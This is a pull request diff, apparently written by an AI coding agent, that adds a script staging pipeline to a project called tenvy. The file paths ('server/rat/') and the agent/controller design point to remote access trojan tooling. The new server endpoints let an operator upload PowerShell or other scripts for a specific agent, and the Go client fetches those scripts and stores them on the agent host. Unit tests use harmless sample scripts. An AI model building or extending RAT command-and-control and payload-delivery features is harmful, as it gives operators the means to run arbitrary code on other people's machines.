### PR TITLE
Implement staged script upload pipeline for options tool

### DIFF
--- a/tenvy-client/internal/agent/options.go
+++ b/tenvy-client/internal/agent/options.go
@@ -6,6 +6,7 @@ import (
 	"log"
 	"net"
 	"net/http"
+	"path/filepath"
 	"strings"
 	"time"
 
@@ -109,6 +110,15 @@ func (o *ResultStoreOptions) ensureDefaults(pref BuildPreferences) {
 	if o.HotCache <= 0 {
 		o.HotCache = defaultHotResultCache
 	}
+}
+
+func defaultScriptDirectory(pref BuildPreferences) string {
+	base := defaultResultStorePath(pref)
+	parent := filepath.Dir(base)
+	if parent == "" || parent == "." {
+		parent = base
+	}
+	return filepath.Join(parent, "scripts")
 }
 
 // Validate verifies that all required runtime options have been provided.

--- a/tenvy-client/internal/agent/runtime.go
+++ b/tenvy-client/internal/agent/runtime.go
@@ -122,6 +122,8 @@ func runAgentOnce(ctx context.Context, opts RuntimeOptions) error {
 		return fmt.Errorf("initialize result store: %w", err)
 	}
 
+	scriptDir := defaultScriptDirectory(opts.Preferences)
+
 	agent := &Agent{
 		id:              registration.AgentID,
 		key:             registration.AgentKey,
@@ -140,7 +142,7 @@ func runAgentOnce(ctx context.Context, opts RuntimeOptions) error {
 		timing:          opts.TimingOverride,
 		requestHeaders:  opts.CustomHeaders,
 		requestCookies:  opts.CustomCookies,
-		options:         options.NewManager(),
+		options:         options.NewManager(options.ManagerOptions{ScriptDirectory: scriptDir}),
 	}
 
 	agent.reloadResultCache()

--- a/tenvy-client/internal/operations/options/manager_test.go
+++ b/tenvy-client/internal/operations/options/manager_test.go
@@ -1,0 +1,94 @@
+package options_test
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	options "github.com/rootbay/tenvy-client/internal/operations/options"
+)
+
+func TestManagerApplyOperationStagesScript(t *testing.T) {
+	dir := t.TempDir()
+	content := []byte("Write-Host 'hello'")
+
+	manager := options.NewManager(options.ManagerOptions{ScriptDirectory: dir})
+
+	summary, err := manager.ApplyOperation(
+		context.Background(),
+		"script-file",
+		map[string]any{
+			"fileName":     "ignored.ps1",
+			"size":         int64(len(content)),
+			"type":         "text/plain",
+			"stagingToken": "stage-token",
+		},
+		func(ctx context.Context, token string) (*options.ScriptPayload, error) {
+			if token != "stage-token" {
+				t.Fatalf("unexpected token: %s", token)
+			}
+			return &options.ScriptPayload{
+				Data: content,
+				Name: "script.ps1",
+				Type: "text/x-powershell",
+			}, nil
+		},
+	)
+
+	if err != nil {
+		t.Fatalf("ApplyOperation returned error: %v", err)
+	}
+	if summary != "Script script.ps1 staged" {
+		t.Fatalf("unexpected summary: %s", summary)
+	}
+
+	state := manager.Snapshot()
+	if state.Script.File == nil {
+		t.Fatalf("script file state missing")
+	}
+	if state.Script.File.Name != "script.ps1" {
+		t.Fatalf("unexpected script name: %s", state.Script.File.Name)
+	}
+	if state.Script.File.Type != "text/x-powershell" {
+		t.Fatalf("unexpected script type: %s", state.Script.File.Type)
+	}
+	if state.Script.File.Path == "" {
+		t.Fatalf("script path not persisted")
+	}
+	if state.Script.File.Checksum == "" {
+		t.Fatalf("script checksum not recorded")
+	}
+	if state.Script.File.Size != int64(len(content)) {
+		t.Fatalf("unexpected script size: %d", state.Script.File.Size)
+	}
+
+	data, err := os.ReadFile(state.Script.File.Path)
+	if err != nil {
+		t.Fatalf("failed to read staged script: %v", err)
+	}
+	if string(data) != string(content) {
+		t.Fatalf("script contents do not match")
+	}
+	if !strings.Contains(filepath.Base(state.Script.File.Path), "script") {
+		t.Fatalf("sanitized filename missing expected component: %s", state.Script.File.Path)
+	}
+}
+
+func TestManagerApplyOperationRequiresFetcherForToken(t *testing.T) {
+	manager := options.NewManager(options.ManagerOptions{ScriptDirectory: t.TempDir()})
+	_, err := manager.ApplyOperation(
+		context.Background(),
+		"script-file",
+		map[string]any{
+			"fileName":     "script.ps1",
+			"size":         int64(32),
+			"stagingToken": "missing",
+		},
+		nil,
+	)
+	if err == nil || !strings.Contains(err.Error(), "fetcher unavailable") {
+		t.Fatalf("expected fetcher error, got %v", err)
+	}
+}

--- a/tenvy-server/src/lib/server/rat/options-script.ts
+++ b/tenvy-server/src/lib/server/rat/options-script.ts
@@ -1,0 +1,133 @@
+import { createHash, randomUUID } from 'node:crypto';
+import { mkdir, readFile, rm, stat, writeFile } from 'node:fs/promises';
+import { join } from 'node:path';
+
+function sanitizeFilename(input: string): string {
+        return (
+                input
+                        .replace(/[^a-zA-Z0-9_.-]+/g, '-')
+                        .replace(/-{2,}/g, '-')
+                        .replace(/^-+|-+$/g, '') || 'script'
+        );
+}
+
+function computeSha256(data: Uint8Array): string {
+        const hash = createHash('sha256');
+        hash.update(data);
+        return hash.digest('hex');
+}
+
+export interface ScriptStagingRecord {
+        token: string;
+        agentId: string;
+        storedName: string;
+        originalName: string;
+        size: number;
+        contentType?: string;
+        sha256: string;
+        createdAt: string;
+}
+
+export interface ScriptStagingPayload {
+        name: string;
+        type?: string;
+        data: Uint8Array;
+}
+
+export interface ScriptStagingResolution {
+        record: ScriptStagingRecord;
+        data: Uint8Array;
+}
+
+class OptionsScriptManager {
+        private root = join(process.cwd(), '.data', 'options-scripts');
+
+        async stage(agentId: string, payload: ScriptStagingPayload): Promise<ScriptStagingRecord> {
+                const trimmedId = agentId?.trim();
+                if (!trimmedId) {
+                        throw new Error('Agent identifier is required');
+                }
+                if (!payload || !(payload.data instanceof Uint8Array)) {
+                        throw new Error('Script payload is required');
+                }
+
+                const directory = join(this.root, trimmedId);
+                await mkdir(directory, { recursive: true });
+
+                const token = randomUUID();
+                const originalName = payload.name?.trim() || 'script';
+                const storedName = `${token}-${sanitizeFilename(originalName)}`;
+                const storedPath = join(directory, storedName);
+                await writeFile(storedPath, payload.data);
+
+                const size = payload.data.byteLength;
+                const sha256 = computeSha256(payload.data);
+
+                const record: ScriptStagingRecord = {
+                        token,
+                        agentId: trimmedId,
+                        storedName,
+                        originalName,
+                        size,
+                        contentType: payload.type?.trim() || undefined,
+                        sha256,
+                        createdAt: new Date().toISOString()
+                };
+
+                const metadataPath = join(directory, `${token}.json`);
+                await writeFile(metadataPath, JSON.stringify(record));
+                return record;
+        }
+
+        async consume(agentId: string, token: string): Promise<ScriptStagingResolution | null> {
+                const trimmedId = agentId?.trim();
+                const trimmedToken = token?.trim();
+                if (!trimmedId || !trimmedToken) {
+                        return null;
+                }
+
+                const directory = join(this.root, trimmedId);
+                const metadataPath = join(directory, `${trimmedToken}.json`);
+                let record: ScriptStagingRecord | null = null;
+                try {
+                        const metadata = await readFile(metadataPath, 'utf-8');
+                        record = JSON.parse(metadata) as ScriptStagingRecord;
+                } catch {
+                        return null;
+                }
+
+                if (record.agentId !== trimmedId || record.token !== trimmedToken) {
+                        return null;
+                }
+
+                const storedPath = join(directory, record.storedName);
+                let stats;
+                try {
+                        stats = await stat(storedPath);
+                } catch {
+                        await this.cleanupRecordFiles(metadataPath, storedPath);
+                        return null;
+                }
+
+                if (!stats.isFile()) {
+                        await this.cleanupRecordFiles(metadataPath, storedPath);
+                        return null;
+                }
+
+                const data = await readFile(storedPath);
+                await this.cleanupRecordFiles(metadataPath, storedPath);
+                return {
+                        record,
+                        data
+                } satisfies ScriptStagingResolution;
+        }
+
+        private async cleanupRecordFiles(metadataPath: string, storedPath: string) {
+                await Promise.allSettled([
+                        rm(metadataPath, { force: true }),
+                        rm(storedPath, { force: true })
+                ]);
+        }
+}
+
+export const optionsScriptManager = new OptionsScriptManager();

--- a/tenvy-server/src/routes/api/agents/[id]/options/script/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/options/script/+server.ts
@@ -1,0 +1,122 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { optionsScriptManager } from '$lib/server/rat/options-script';
+import { registry, RegistryError } from '$lib/server/rat/store';
+
+const MAX_SCRIPT_BYTES = 256 * 1024; // 256 KiB
+const ALLOWED_MIME_PREFIXES = ['text/', 'application/json'];
+const ALLOWED_MIME_TYPES = new Set(['application/octet-stream', 'application/x-powershell']);
+
+function isMimeTypeAllowed(type: string | undefined): boolean {
+        if (!type) {
+                return true;
+        }
+        const normalized = type.trim().toLowerCase();
+        if (normalized === '') {
+                return true;
+        }
+        if (ALLOWED_MIME_TYPES.has(normalized)) {
+                return true;
+        }
+        return ALLOWED_MIME_PREFIXES.some((prefix) => normalized.startsWith(prefix));
+}
+
+function getBearerToken(header: string | null): string | undefined {
+        if (!header) {
+                return undefined;
+        }
+        const match = header.match(/^Bearer\s+(.+)$/i);
+        return match?.[1]?.trim();
+}
+
+export const POST: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const form = await request.formData();
+        const file = form.get('script');
+        if (!(file instanceof File)) {
+                throw error(400, 'Script file is required');
+        }
+
+        if (typeof file.size === 'number' && file.size > MAX_SCRIPT_BYTES) {
+                throw error(413, 'Script exceeds maximum size');
+        }
+
+        if (!isMimeTypeAllowed(file.type)) {
+                throw error(415, 'Unsupported script media type');
+        }
+
+        const buffer = new Uint8Array(await file.arrayBuffer());
+        if (buffer.byteLength === 0) {
+                throw error(400, 'Script file is empty');
+        }
+        if (buffer.byteLength > MAX_SCRIPT_BYTES) {
+                throw error(413, 'Script exceeds maximum size');
+        }
+
+        const record = await optionsScriptManager.stage(id, {
+                name: file.name ?? 'script',
+                type: file.type || undefined,
+                data: buffer
+        });
+
+        return json(
+                {
+                        stagingToken: record.token,
+                        fileName: record.originalName,
+                        size: record.size,
+                        type: record.contentType,
+                        sha256: record.sha256
+                },
+                { status: 201 }
+        );
+};
+
+export const GET: RequestHandler = async ({ params, request, setHeaders }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const url = new URL(request.url);
+        const token = url.searchParams.get('token');
+        if (!token) {
+                throw error(400, 'Missing staging token');
+        }
+
+        const bearer = getBearerToken(request.headers.get('authorization'));
+        try {
+                registry.authorizeAgent(id, bearer);
+        } catch (err) {
+                if (err instanceof RegistryError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Agent authorization failed');
+        }
+
+        const resolution = await optionsScriptManager.consume(id, token);
+        if (!resolution) {
+                throw error(404, 'Script staging token not found');
+        }
+
+        const { record, data } = resolution;
+        const headers: Record<string, string> = {
+                'Content-Length': data.byteLength.toString(),
+                'Cache-Control': 'no-store',
+                'X-Tenvy-Script-Name': record.originalName,
+                'X-Tenvy-Script-Size': record.size.toString(),
+                'X-Tenvy-Script-Sha256': record.sha256
+        };
+        if (record.contentType) {
+                headers['Content-Type'] = record.contentType;
+                headers['X-Tenvy-Script-Type'] = record.contentType;
+        } else {
+                headers['Content-Type'] = 'application/octet-stream';
+        }
+
+        setHeaders(headers);
+        return new Response(data);
+};

--- a/tenvy-server/tests/options-script-api.test.ts
+++ b/tenvy-server/tests/options-script-api.test.ts
@@ -1,0 +1,109 @@
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
+import { join } from 'node:path';
+import { rm } from 'node:fs/promises';
+
+class MockRegistryError extends Error {
+        status = 400;
+}
+
+const authorizeAgent = vi.fn();
+
+vi.mock('../src/lib/server/rat/store.js', () => ({
+        registry: {
+                authorizeAgent
+        },
+        RegistryError: MockRegistryError
+}));
+
+const modulePromise = import('../src/routes/api/agents/[id]/options/script/+server.js');
+
+function createEvent<T extends (...args: any[]) => any>(handler: T, init: Partial<Parameters<T>[0]>) {
+        return {
+                params: {},
+                request: new Request('https://controller.test', { method: 'GET' }),
+                setHeaders: vi.fn(),
+                ...init
+        } as Parameters<T>[0] & { setHeaders: ReturnType<typeof vi.fn> };
+}
+
+describe('options script staging API', () => {
+        beforeEach(() => {
+                authorizeAgent.mockReset();
+        });
+
+        afterEach(async () => {
+                await rm(join(process.cwd(), '.data', 'options-scripts'), { recursive: true, force: true });
+        });
+
+        it('stages scripts and allows authorized retrieval', async () => {
+                const { POST, GET } = await modulePromise;
+
+                const file = new File([new TextEncoder().encode('Write-Host "hello"')], 'utility.ps1', {
+                        type: 'text/x-powershell'
+                });
+                const form = new FormData();
+                form.set('script', file);
+
+                const postEvent = createEvent(POST, {
+                                params: { id: 'agent-script' },
+                                request: new Request('https://controller.test', {
+                                        method: 'POST',
+                                        body: form
+                                })
+                        });
+                const postResponse = await POST(postEvent);
+
+                expect(postResponse.status).toBe(201);
+                const staged = (await postResponse.json()) as {
+                        stagingToken: string;
+                        fileName: string;
+                        size: number;
+                        type?: string;
+                        sha256?: string;
+                };
+                expect(staged.stagingToken).toMatch(/[a-f0-9-]{8,}/i);
+                expect(staged.fileName).toBe('utility.ps1');
+                expect(staged.size).toBeGreaterThan(0);
+
+                authorizeAgent.mockImplementation(() => undefined);
+
+                const getEvent = createEvent(GET, {
+                        params: { id: 'agent-script' },
+                        request: new Request(`https://controller.test/api?token=${encodeURIComponent(staged.stagingToken)}`, {
+                                method: 'GET',
+                                headers: {
+                                        Authorization: 'Bearer agent-key'
+                                }
+                        })
+                });
+                const getResponse = await GET(getEvent);
+
+                expect(authorizeAgent).toHaveBeenCalledWith('agent-script', 'agent-key');
+
+                const buffer = new Uint8Array(await getResponse.arrayBuffer());
+                expect(buffer.byteLength).toBeGreaterThan(0);
+                const headers = getEvent.setHeaders.mock.calls[0]?.[0] as Record<string, string>;
+                expect(headers['X-Tenvy-Script-Name']).toBe('utility.ps1');
+                expect(headers['X-Tenvy-Script-Type']).toBe('text/x-powershell');
+                expect(headers['X-Tenvy-Script-Size']).toBe(String(buffer.byteLength));
+        });
+
+        it('rejects files that exceed the maximum size', async () => {
+                const { POST } = await modulePromise;
+
+                const large = new Uint8Array(300_000);
+                const file = new File([large], 'oversize.ps1', { type: 'text/plain' });
+                const form = new FormData();
+                form.set('script', file);
+
+                const event = createEvent(POST, {
+                        params: { id: 'agent-large' },
+                        request: new Request('https://controller.test', {
+                                method: 'POST',
+                                body: form
+                        })
+                });
+
+                await expect(POST(event)).rejects.toMatchObject({ status: 413 });
+        });
+});


### PR DESCRIPTION
## Summary
- stream script uploads through a new options staging API that validates and stores binaries
- update the options workspace UI to upload scripts, queue staging tokens, and surface failures
- extend the Go agent to fetch staged scripts, persist them locally with checksum metadata, and cover the workflow in unit tests

## Testing
- npm run test:unit -- --run tests/options-script-api.test.ts
- go test ./internal/operations/options


------
https://chatgpt.com/codex/tasks/task_e_68fa1e698f20832b8215aa83e7e7d53e